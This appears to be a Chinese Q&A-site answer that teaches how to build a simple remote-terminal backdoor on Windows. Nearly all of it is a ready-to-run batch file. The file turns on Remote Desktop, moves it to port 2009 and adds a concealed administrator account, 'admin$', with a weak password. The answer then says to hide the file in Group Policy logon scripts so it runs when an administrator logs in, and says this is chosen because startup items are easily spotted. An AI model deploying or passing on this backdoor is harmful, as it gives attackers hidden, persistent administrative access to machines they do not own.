***回答
树之空
回答于:2021-08-09
本文主要讲述简单型远程终端后门的制作方法,以便大家了解后门的实现与使用。
通常提权时会想到启动项目,如果后门留到这个位置肯定是不适合的。很容易就被别人发现。往往组策略添加脚本执行是一个比较好的方法,在组策略登录脚本设置后门执行代码当管理员登录时后门就会被创建。
把以下内容保存为1.bat。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f //开启终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0×7d9 /f //改为2009连接终端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0×7d9 /f //改为2009连接终端
net user admin$ 123123 /add
net localgroup administrators admin$ /add
打开组策略,开始--运行-gpedit.msc
用户配置--windows设置-脚本--登录 把1.bat copy到登录脚本目录添加1.bat即可。